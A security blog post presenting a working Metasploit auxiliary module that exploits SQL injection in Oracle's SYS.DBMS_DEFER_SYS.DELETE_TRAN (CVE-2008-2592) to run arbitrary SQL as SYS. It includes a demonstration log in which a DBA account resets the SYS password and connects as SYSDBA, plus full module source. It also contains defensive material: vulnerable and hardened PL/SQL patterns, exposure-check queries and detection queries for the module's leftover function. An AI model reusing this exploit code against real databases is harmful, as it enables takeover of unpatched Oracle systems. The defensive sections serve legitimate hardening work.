In some of the past posts I covered finding a default Oracle user account, or an account with an easy-to-guess username/password, and taking that user to DBA via SQL injection in Oracle packages.
I've been neglecting the blog a bit while porting some of the public SQLI for Oracle into Metasploit auxiliary modules. Not sure when it's going to be put into the trunk, but it will be at some point; I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.
Anyway, since it's the week of Christmas (or whatever you celebrate), I thought I'd put out a module for a vulnerability that has a public advisory but no public exploit code.
So... coverage for: http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml
Details: The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.
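The defect class the advisory describes is worth seeing in its smallest form. The snippet below is an added illustration, not Oracle's code and not the real DBMS_DEFER_SYS source (which ships wrapped); DEMO_DELETE_TRAN_BAD, DEMO_DELETE_TRAN_OK, DEMO_DEFTRAN and the parameter names are hypothetical. It shows why splicing a caller-supplied string into dynamic SQL inside a definer's-rights procedure hands the caller the owner's privileges, and the bind-variable form that closes the hole.

```sql
-- Added illustration (not from the original post): the bug class behind
-- CVE-2008-2592 in miniature. Object names are hypothetical.

-- Vulnerable pattern. A procedure is definer's rights by default, so it runs
-- with its owner's privileges (SYS, in the real package). Concatenating the
-- caller's argument into the statement text means anything placed in
-- p_tran_id becomes SQL that executes as the owner.
CREATE OR REPLACE PROCEDURE demo_delete_tran_bad (p_tran_id IN VARCHAR2) AS
BEGIN
  EXECUTE IMMEDIATE
    'DELETE FROM demo_deftran WHERE deferred_tran_id = ''' || p_tran_id || '''';
END;
/

-- Hardened pattern. The statement text is fixed and the argument travels as
-- a bind variable, so it can only ever be data, never part of the statement.
CREATE OR REPLACE PROCEDURE demo_delete_tran_ok (p_tran_id IN VARCHAR2) AS
BEGIN
  EXECUTE IMMEDIATE
    'DELETE FROM demo_deftran WHERE deferred_tran_id = :tid'
    USING p_tran_id;
END;
/

-- Where an identifier rather than a value has to be spliced in (a table or
-- column name cannot be bound), validate it first instead of trusting it:
--   EXECUTE IMMEDIATE 'DELETE FROM ' || DBMS_ASSERT.SQL_OBJECT_NAME(p_table)
--     || ' WHERE deferred_tran_id = :tid' USING p_tran_id;
-- DBMS_ASSERT is available from 10gR2 (and backported in the CPU releases).
```

A second, independent layer is to declare such a procedure AUTHID CURRENT_USER when it does not genuinely need the owner's privileges; then even a successful injection only runs as the caller, which is the boundary the DBA role is supposed to respect.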
Impact: Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.
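Before worrying about the exploit, a DBA wants to know whether a given instance is exposed. The queries below are an added example, not part of the original post; they use only standard Oracle dictionary views and should be run from SQL*Plus as a user with SELECT on the DBA_ views. The patch-history check assumes a 10g or later database, since DBA_REGISTRY_HISTORY is populated by the CPU install scripts from that release on.

```sql
-- Added example (not from the original post): exposure check for the
-- SYS.DBMS_DEFER_SYS injection. Dictionary views are real; comments are mine.

-- 1. Who can reach the vulnerable entry point directly?
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_DEFER_SYS'
 ORDER BY grantee;

-- 2. The DBA role carries EXECUTE on SYS.DBMS_DEFER_SYS by default, so every
--    DBA grantee is in scope as well; review this list, not just the first.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;

-- 3. Is the DBA/SYSDBA boundary still in force? With
--    O7_DICTIONARY_ACCESSIBILITY = FALSE (the default) a DBA cannot alter
--    SYS-owned objects, which is exactly the barrier this injection crosses.
SELECT name, value
  FROM v$parameter
 WHERE name = 'O7_DICTIONARY_ACCESSIBILITY';

-- 4. Has the July 2008 Critical Patch Update (or a later one) been applied?
--    Assumption: 10g or later. An empty result means no CPU/PSU was recorded.
SELECT action_time, action, version, id, comments
  FROM dba_registry_history
 WHERE action IN ('CPU', 'APPLY')
 ORDER BY action_time DESC;
```

If query 4 shows nothing at or after the July 2008 CPU, every grantee returned by queries 1 and 2 can reach SYS through this package regardless of what query 3 says; the parameter only matters once the package is patched.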
Let's see it in action, assuming we got DBA from one of the other SQLI modules.
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER                         DBA                            NO  YES NO

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
*
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...
[*] Done...
[*] Auxiliary module execution completed
cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba
SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008
Copyright (c) 1982, 2007, Oracle. All rights reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL> select user from dual;

USER
------------------------------
SYS

SQL>
Tested on 9i and 10g release 1.
codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb
It's definitely a work in progress, so if you have feedback, send it.
----------------------------------------code-------------------------------------------
##
# $Id: dbms_defer_sys.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::ORACLE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SQL Injection via SYS.DBMS_DEFER_SYS',
			'Description'    => %q{
				This module exploits a SQL injection vulnerability in the
				SYS.DBMS_DEFER_SYS package. Any Oracle database user with EXECUTE
				privilege on SYS.DBMS_DEFER_SYS can exploit this vulnerability; by
				default that is any user granted DBA, plus anyone granted EXECUTE
				on the package directly. Exploitation allows an attacker to execute
				SQL commands with SYS privilege.
				Affected versions: Oracle Database Server 9iR1, 9iR2, 10gR1, 10gR2
				and 11gR1. Fixed with the Oracle Critical Patch Update of July 2008.
				See additional comments in source.
			},
			'Author'         => 'CG |at| carnal0wnage |dot| com',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2008-2592' ],
					[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml' ],
					[ 'URL', 'http://seclists.org/fulldisclosure/2008/Aug/0229.html' ],
				],
			'DisclosureDate' => 'Jul 29 2008'))

		register_options(
			[
				OptString.new('DBA', [ false, 'DB user to elevate to DBA.', 'SCOTT' ]),
				OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT' ]),
			], self.class)
	end

	# from: http://seclists.org/fulldisclosure/2008/Aug/0229.html
	# The DBA role in Oracle Database is not the same as SYSDBA privilege,
	# which is granted to SYS. There are many things that a user granted the
	# DBA role can't do - the most important being the ability to alter SYS
	# owned objects. This is true on databases where
	# O7_DICTIONARY_ACCESSIBILITY=FALSE (default value).
	# Read the rest of the FD post for more usage ideas.
	def run
		c = connect

		# Random name for the helper function created in the caller's schema.
		p = Rex::Text.rand_text_alpha(rand(8) + 1)
		query = datastore['SQL'].upcase

		# fun queries
		# set SQL "alter user SYS identified by my!supersecretpassword"
		# connect as: sys/my!supersecretpassword@IP/SID as sysdba
		# set SQL "GRANT DBA to user"

		# Invoker's-rights function that runs the supplied SQL in its own
		# transaction; when reached through the SYS-owned package it runs as SYS.
		function = "
			CREATE OR REPLACE FUNCTION #{p}
			RETURN NUMBER AUTHID CURRENT_USER AS
			PRAGMA AUTONOMOUS_TRANSACTION;
			BEGIN
				EXECUTE IMMEDIATE '#{query}';
				COMMIT;
				RETURN(0);
			END;
		"

		# So far I haven't figured out how to see the output of the query with this module.
		# The user executing this module will have to be DBA or have execute privileges
		# on the SYS.DBMS_DEFER_SYS package (which is just DBA by default).
		call = "
			BEGIN
				SYS.DBMS_DEFER_SYS.DELETE_TRAN ('''||'||user||'.#{p}||''','');
			END;
		"

		print_status("Sending function..")
		prepare_exec(function)
		print_status("Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...")
		prepare_exec(call)

		c.disconnect
	end

end
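The module leaves a recognisable footprint: a randomly named one-line function in the calling user's schema that combines AUTHID CURRENT_USER, PRAGMA AUTONOMOUS_TRANSACTION and EXECUTE IMMEDIATE, followed by a call into SYS.DBMS_DEFER_SYS.DELETE_TRAN. The queries below are an added hunting example, not part of the module or the original post; they rely only on standard dictionary views. The 7-day window and the exclusion of SYS/SYSTEM are assumptions to tune per environment, and REGEXP_LIKE requires 10g or later.

```sql
-- Added example (not from the original post): hunt for the artefacts the
-- module creates. Window and schema exclusions are assumptions.

-- 1. Functions outside the system schemas whose source carries all three
--    markers used by the module's stub. Legitimate code rarely needs
--    invoker's rights, an autonomous transaction and EXECUTE IMMEDIATE in
--    one short function, so hits deserve a look.
SELECT s.owner, s.name, o.created
  FROM dba_source s
  JOIN dba_objects o
    ON o.owner = s.owner
   AND o.object_name = s.name
   AND o.object_type = 'FUNCTION'
 WHERE s.type = 'FUNCTION'
   AND s.owner NOT IN ('SYS', 'SYSTEM')
 GROUP BY s.owner, s.name, o.created
HAVING SUM(CASE WHEN UPPER(s.text) LIKE '%AUTHID CURRENT_USER%'  THEN 1 ELSE 0 END) > 0
   AND SUM(CASE WHEN UPPER(s.text) LIKE '%AUTONOMOUS_TRANSACTION%' THEN 1 ELSE 0 END) > 0
   AND SUM(CASE WHEN UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%'      THEN 1 ELSE 0 END) > 0
 ORDER BY o.created DESC;

-- 2. Recently created functions with short, all-letter names, matching
--    Rex::Text.rand_text_alpha(1..8) as used above. Noisy on its own, useful
--    joined against the list from query 1.
SELECT owner, object_name, created, status
  FROM dba_objects
 WHERE object_type = 'FUNCTION'
   AND owner NOT IN ('SYS', 'SYSTEM')
   AND created > SYSDATE - 7
   AND REGEXP_LIKE(object_name, '^[A-Z]{1,8}$')
 ORDER BY created DESC;

-- 3. If statement auditing is enabled (AUDIT ALTER USER / GRANT / CREATE
--    PROCEDURE), pull the records that correspond to the "fun queries"
--    the module offers, plus the helper-function creation itself.
SELECT timestamp, username, userhost, action_name, obj_name, returncode
  FROM dba_audit_trail
 WHERE action_name IN ('ALTER USER', 'GRANT ROLE', 'GRANT OBJECT', 'CREATE FUNCTION')
   AND timestamp > SYSDATE - 7
 ORDER BY timestamp DESC;
```

The function is not dropped by the module, so query 1 tends to be the most reliable signal after the fact; the audit rows in query 3 only exist if those statements were being audited before the activity, which is the argument for enabling them ahead of time rather than after.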